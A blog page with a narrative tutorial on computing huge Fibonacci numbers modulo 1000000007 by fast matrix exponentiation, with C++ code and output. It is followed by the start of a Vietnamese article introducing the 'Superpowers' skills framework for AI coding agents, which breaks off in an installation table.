<!--kg-card-end: markdown--><p>Splendid! You pull out the classic snippet that every student who has studied dynamic programming knows: a single loop that builds the Fibonacci numbers one by one up to n with the very recurrence that defines the sequence, <strong>F(n) = F(n - 1) + F(n - 2)</strong>. With <strong>O(n)</strong> time complexity, it gets the 1000000th Fibonacci number (mod 1000000007) in well under a second.</p><p>You present this code to <strong>B</strong>, feeling like a savior rescuing <strong>B</strong>, a person whose struggle in life is computing Fibonacci numbers, and you expect <strong>B</strong> to gaze at you with sparkling eyes and thank you with all his heart.</p><p>And just like that, <strong>B</strong> replies:</p><p><em>Ah, you're good! Two years ago I wrote a snippet just like that and got the 1000000th Fibonacci number too. Thanks for the kind thought, but the one I'm after is the 1000000000000000000th.</em></p><p>...</p><p>Perhaps you forgot that you yourself called it <strong>"the classic snippet that every student who has studied dynamic programming knows"</strong>. <strong>B</strong> goes to the same school, studies the same major, and sits in the same class as you; that's exactly why you noticed <strong>B</strong> struggling and rushed over to help in the first place. So of course <strong>B</strong> knows this code, and of course everyone in the class knows it too.</p><p>You stand there, feeling every eye in the room on you. Time seems to freeze; this is the tensest moment of your life. In <strong>21 nanoseconds</strong>, the whole class will see through your "savior" act. 
When those 21 nanoseconds are up, either you become the class clown and live with the humiliation for the rest of your life, or you truly become a savior by <strong>using code that not every student learns in dynamic programming</strong>.</p><p>But you know full well that you don't know any such code. You are Schrödinger's cat, except that when the black box opens in 21 nanoseconds there is only one possible outcome: <strong>the cat is dead</strong>. You know exactly what you have to do. In 21 nanoseconds, you must create the possibility that the cat is alive.</p><p>With all the brain cells you've saved up since birth, you start to think.</p><hr><p><em>21 nanoseconds</em></p><hr><p><strong>With just O(1) time complexity...</strong></p><p>In economics class, you learned a closed-form formula for Fibonacci numbers built on the golden ratio.</p><figure class="kg-card kg-image-card"></figure><p><em>Binet's formula. That's the one.</em></p><p><em>Just plug in n and out comes the answer, no real work needed. With O(1) time complexity, you can compute whichever Fibonacci number you like, right?</em></p><p>That's what you thought. But then you realized: <strong>you have to compute the n-th Fibonacci number modulo 1000000007</strong>.</p><p>Applying the formula under a modulus means modular arithmetic and modular inverses, and worse, it needs √5 modulo 1000000007, which does not exist among the integers mod 1000000007 (5 is not a quadratic residue there, since 1000000007 ≡ 2 mod 5), so you would have to compute in an extension field. Not pleasant at all.</p><p>And if you just evaluate it with floating-point numbers and round, floating-point error quietly piles up; for large n the final number is nowhere near the right answer (F(10<sup>18</sup>) alone has roughly 2 × 10<sup>17</sup> decimal digits).</p><p>You have to find another way.</p><hr><p><em>17 nanoseconds</em></p><hr><p><strong>Matrices</strong>. Matrices?</p><p>You're thinking about matrices. Not the Matrix from the movie where a man in a black suit suddenly raises his hand and somehow stops a hail of bullets, but matrices from linear algebra. 
Not just any matrix, either: one specific matrix that popped into your head as if by magic:</p><figure class="kg-card kg-image-card"></figure><p>Why this matrix? You honestly have no idea why you thought of it. You could be spending your time applying the algorithms the experts use, and instead you've come up with one completely arbitrary, oddly specific matrix that does nothing? What a waste of time...</p><hr><p><em>15 nanoseconds</em></p><hr><p>You wasted time.</p><p>There's no time left to think. But with the matrix you came up with, you decide to multiply it by a vector.</p><figure class="kg-card kg-image-card"></figure><p>...and then multiply the result by that matrix again.</p><figure class="kg-card kg-image-card"></figure><p>...and you keep going.</p><figure class="kg-card kg-image-card"></figure><p>Something looks familiar. More precisely, the numbers, and the sequence they form, feel very familiar. Of course: it's the Fibonacci sequence!</p><hr><p><em>10 nanoseconds</em></p><hr><p>You keep thinking, more generally now. You picture a two-element vector whose first element is the <strong>(n - 1)</strong>-th Fibonacci number and whose second element is the <strong>n</strong>-th, and you multiply it by that matrix.</p><figure class="kg-card kg-image-card"></figure><p>You see it at once: if you keep going...</p><figure class="kg-card kg-image-card"></figure><p>In other words, if you do this:</p><figure class="kg-card kg-image-card"></figure><p>then you get <strong>the n-th Fibonacci number</strong>!</p><hr><p><em>6 nanoseconds</em></p><hr><p>You need an algorithm that computes the <strong>(n - 1)</strong>-th power of that matrix with low time complexity: at the very least below O(n), or the effort of the last 15 nanoseconds goes to waste. What about an algorithm with <strong>O(log n)</strong> time complexity? 
Which algorithms run in O(log n)? Segment tree? Binary search? Divide and conquer?...</p><hr><p><em>4 nanoseconds</em></p><hr><p><strong>Divide and conquer!</strong></p><p>You notice something:</p><figure class="kg-card kg-image-card"></figure><p>To compute the <strong>k</strong>-th power of the matrix, you only need the <strong>k/2</strong>-th power (square it, and multiply by the matrix once more when k is odd). To compute the <strong>k/2</strong>-th power, you need the <strong>k/4</strong>-th power... so only about log<sub>2</sub> k levels are needed.</p><hr><p><em>1 nanosecond</em></p><hr><p>With your keyboard-warrior skills...</p><!--kg-card-begin: markdown--><pre><code class="language-cpp">#include <iostream>
#include <cassert>
#include <vector>
using namespace std;

using LL = long long;
using Matrix = vector<vector<LL>>;

const int MOD = 1e9 + 7;

Matrix identity(int dim) {
    Matrix I(dim, vector<LL>(dim, 0));
    for (int i = 0; i < dim; i++)
        I[i][i] = 1;
    return I;
}

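// Multiplies A (n×k) by B (k×m), reducing each entry modulo MOD.
// Entries stay below MOD ≈ 1e9, so A[i][p] * B[p][j] fits in a long long.
Matrix mulMod(const Matrix& A, const Matrix& B, int MOD) {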
    assert(A.size() != 0);
    assert(B.size() != 0);
    assert(A[0].size() == B.size());

    int n = A.size(), m = B[0].size(), k = B.size();
    Matrix C(n, vector<long long>(m, 0));

    for (int i = 0; i < n; i++)
        for (int j = 0; j < m; j++)
            for (int p = 0; p < k; p++)
                C[i][j] = (C[i][j] + A[i][p] * B[p][j]) % MOD;

    return C;
}

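// Computes A^k modulo MOD by divide and conquer:
// A^k = (A^(k/2))^2, multiplied by A once more when k is odd.
Matrix matPowMod(const Matrix& A, LL k, int MOD) {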
    assert(A.size() != 0);
    assert(A.size() == A[0].size());
    int dim = A.size();
    if(k == 0) {
        return identity(dim);
    }
    if(k == 1) {
        return A;
    }
    
    Matrix B = matPowMod(A, k / 2, MOD);
    Matrix squaredB = mulMod(B, B, MOD);
    if(k % 2 == 0) {
        return squaredB;
    }
    
    return mulMod(squaredB, A, MOD);
}

int main() {
    LL n = 1000000000000000000LL;

    Matrix trans = {
        {0, 1},
        {1, 1}
    };

    // trans^(n-1); the n - 1 exponent assumes n >= 1
    Matrix powered = matPowMod(trans, n - 1, MOD);

    Matrix init = {{0, 1}};

    // [0, 1] * trans^(n-1) = [F(n-1), F(n)]
    Matrix result = mulMod(init, powered, MOD);

    cout << "F(" << n << ") mod " << MOD << " = " << result[0][1] << endl;
    return 0;
}
</code></pre>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>F(1000000000000000000) mod 1000000007 = 209783453
</code></pre>
<!--kg-card-end: markdown--><hr><p>...</p><p>...</p><p>...</p><p>Who is <strong>B</strong>? Does it really matter? One fine day, a day that is certainly not today, perhaps not in the past, perhaps not in the future, the schoolboy, or the university student, or just a guy, solved a problem: <a href="https://codeforces.com/problemset/problem/1513/C">Problem - 1513C - Codeforces</a>. The statement and tests were designed so that the intended solution takes close to <strong>1 second</strong> on the largest input the problem allows. Yet on the standings, the place that keeps a trace, a record, of everyone who put in the effort to solve the problem, <strong>B</strong>'s name is listed together with his program's running time: <strong>0.1 seconds</strong>. <strong>B</strong> really isn't good at arithmetic, but that doesn't mean he relies only on his own human computing power. Will <strong>B</strong> realize this, or has he already?</p>
</article>
<article>
<h1>Superpowers: Turning an AI Coding Agent into a Disciplined Senior Developer</h1>
<p>Đ.Đ.N — Fri, 26 Jun 2026 03:57:58 GMT</p>
<p><a href="https://github.com/obra/superpowers">Superpowers</a> là một methodology + skills framework cho AI coding agents với 228k stars trên GitHub. Nó không làm AI "thông minh hơn" — nó làm AI <strong>có kỷ luật hơn</strong>: bắt buộc hỏi trước khi code, viết spec, lập plan, TDD, review, rồi mới merge. AI có thể chạy autonomous 1-2 tiếng mà không đi lệch kế hoạch.</p><hr><h3 id="1-v-n-th-c-t-m-superpowers-gi-i-quy-t">1. Vấn đề thực tế mà Superpowers giải quyết</h3><p>Ai dùng Claude Code / Cursor / Codex đều gặp tình huống này:</p><figure class="kg-card kg-image-card"></figure><p><strong>Insight quan trọng</strong>: AI không thiếu intelligence. Nó thiếu <strong>discipline</strong>. Superpowers bổ sung đúng thứ đó.</p><hr><h3 id="2-superpowers-l-g-">2. Superpowers là gì?</h3><p>Về bản chất, Superpowers là <strong>một folder markdown files</strong> đóng gói:</p><ul><li>Một <strong>software development methodology</strong> (phương pháp phát triển phần mềm)</li><li>Một bộ <strong>composable skills</strong> (kỹ năng có thể kết hợp)</li><li>Một cơ chế <strong>auto-activation</strong> (tự động kích hoạt theo context)</li></ul><figure class="kg-card kg-image-card"></figure><p><strong>Điểm khác biệt lớn nhất</strong>: Skills trigger <strong>tự động</strong>. Bạn không cần gõ command đặc biệt. AI tự biết khi nào cần brainstorm, khi nào cần TDD, khi nào cần review.</p><hr><h3 id="3-c-i-t">3. 
Installation</h3><p>Superpowers supports most of today's AI coding agents:</p><!--kg-card-begin: html--><table data-source-line="70"><thead data-source-line="70" 
style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><tr data-source-line="70" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; 
--tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><th style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-weight: 700; color: rgb(0, 0, 0); border: 1px solid rgb(214, 214, 214); padding: 6px 13px;">Agent</th><th style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; 
--tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-weight: 700; color: rgb(0, 0, 0); border: 1px solid rgb(214, 214, 214); padding: 6px 13px;">Cách cài</th></tr></thead><tbody data-source-line="72" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; 
--tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><tr data-source-line="72" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 
246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">Claude Code</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; 
--tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><code style="font-family: Menlo, Monaco, Consolas, "Courier New", monospace; color: rgb(0, 0, 0); background-color: rgb(240, 240, 240); padding: 0.2em 0px; border-radius: 3px; --tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 
0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-size: 0.85em;">/plugin install superpowers@claude-plugins-official</code></td></tr><tr data-source-line="73" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; 
--tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; 
--tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">Codex CLI</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><code style="font-family: Menlo, Monaco, Consolas, "Courier New", monospace; color: rgb(0, 0, 0); background-color: rgb(240, 240, 240); padding: 0.2em 0px; border-radius: 3px; --tw-border-spacing-x: 0; --tw-border-spacing-y: 0; 